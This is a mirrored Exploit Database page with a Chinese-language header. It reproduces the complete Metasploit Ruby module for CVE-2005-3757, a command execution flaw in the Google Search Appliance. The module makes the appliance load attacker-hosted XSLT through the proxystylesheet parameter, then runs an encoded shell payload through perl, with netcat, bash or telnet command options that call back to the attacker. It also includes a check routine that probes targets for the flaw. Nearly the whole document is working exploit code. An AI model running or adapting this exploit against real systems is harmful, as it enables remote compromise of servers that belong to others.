Google Appliance ProxyStyleSheet – Command Execution (Metasploit)

• Exploit Database
• 139 阅读

• 作者： Metasploit
  日期： 2010-07-01
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/16907/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152

  ## # $Id: google_proxystylesheet_exec.rb 9653 2010-07-01 23:33:07Z jduck $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##     require &apos;msf/core&apos;     class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;Google Appliance ProxyStyleSheet Command Execution&apos;, &apos;Description&apos;=> %q{ This module exploits a feature in the Saxon XSLT parser used by the Google Search Appliance. This feature allows for arbitrary java methods to be called. Google released a patch and advisory to their client base in August of 2005 (GA-2005-08-m). The target appliance must be able to connect back to your machine for this exploit to work. }, &apos;Author&apos; => [ &apos;hdm&apos; ], &apos;License&apos;=> MSF_LICENSE, &apos;Version&apos;=> &apos;$Revision: 9653 $&apos;, &apos;References&apos; => [ [&apos;CVE&apos;, &apos;2005-3757&apos;], [&apos;OSVDB&apos;, &apos;20981&apos;], [&apos;BID&apos;, &apos;15509&apos;], ], &apos;Privileged&apos; => false, &apos;Payload&apos;=> { &apos;DisableNops&apos; => true, &apos;Space&apos; => 4000, &apos;Compat&apos;=> { &apos;PayloadType&apos; => &apos;cmd&apos;, &apos;RequiredCmd&apos; => &apos;generic perl bash telnet netcat-e&apos;, } }, &apos;Platform&apos; => &apos;unix&apos;, &apos;Arch&apos; => ARCH_CMD, &apos;Targets&apos;=> [[ &apos;Automatic&apos;, { }]], &apos;DisclosureDate&apos; => &apos;Aug 16 2005&apos;, &apos;Stance&apos; => Msf::Exploit::Stance::Aggressive, &apos;DefaultTarget&apos; => 0)) end   # Handle incoming requests from the appliance def on_request_uri(cli, request)   print_status("Handling new incoming HTTP request...")   exec_str = &apos;/usr/bin/perl -e system(pack(qq{H*},qq{&apos; + payload.encoded.unpack("H*")[0] + &apos;}))&apos; data = @xml_data.gsub(/:x:MSF:x:/, exec_str) send_response(cli, data) end   def check res = send_request_cgi({ &apos;uri&apos;=> &apos;/search&apos;, &apos;vars_get&apos; => { &apos;client&apos;=> rand_text_alpha(rand(15)+1), &apos;site&apos;=> rand_text_alpha(rand(15)+1), &apos;output&apos;=> &apos;xml_no_dtd&apos;, &apos;q&apos; => rand_text_alpha(rand(15)+1), &apos;proxystylesheet&apos; => &apos;http://&apos; + rand_text_alpha(rand(15)+1) + &apos;/&apos; } }, 10)   if (res and res.body =~ /cannot be resolved to an ip address/) print_status("This system appears to be vulnerable") return Exploit::CheckCode::Vulnerable end   if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/) print_status("This system appears to be patched") end   print_status("This system is not exploitable") return Exploit::CheckCode::Safe end     def exploit   # load the xml data path = File.join(Msf::Config.install_root, "data", "exploits", "google_proxystylesheet.xml") fd = File.open(path, "rb") @xml_data = fd.read(fd.stat.size) fd.close   print_status("Obtaining the appliance site and client IDs...") # Send a HTTP/1.0 request to learn the site configuration res = send_request_raw({ &apos;uri&apos; => &apos;/&apos;, &apos;version&apos; => &apos;1.0&apos; }, 10)   if !(res and res[&apos;location&apos;] and res[&apos;location&apos;] =~ /site=/) print_status("Could not read the location header: #{res.code} #{res.message}") return end   m = res[&apos;location&apos;].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im) if !(m and m[1] and m[2]) print_status("Invalid location header: #{res[&apos;location&apos;]}") return end   print_status("Starting up our web service on http://#{datastore[&apos;SRVHOST&apos;]}:#{datastore[&apos;SRVPORT&apos;]}#{resource_uri}...") start_service   print_status("Requesting a search using our custom XSLT...") res = send_request_cgi({ &apos;uri&apos;=> &apos;/search&apos;, &apos;vars_get&apos; => { &apos;client&apos;=> m[2], &apos;site&apos;=> m[1], &apos;output&apos;=> &apos;xml_no_dtd&apos;, &apos;q&apos; => rand_text_alpha(rand(15)+1), &apos;proxystylesheet&apos; => "http://#{datastore[&apos;SRVHOST&apos;]}:#{datastore[&apos;SRVPORT&apos;]}#{resource_uri}/style.xml", &apos;proxyreload&apos; => &apos;1&apos; } }, 25)   if (res) print_status("The server returned: #{res.code} #{res.message}") print_status("Waiting on the payload to execute...") select(nil,nil,nil,20) else print_status("No response from the server") end   print_status("Shutting down the web service...") stop_service end   end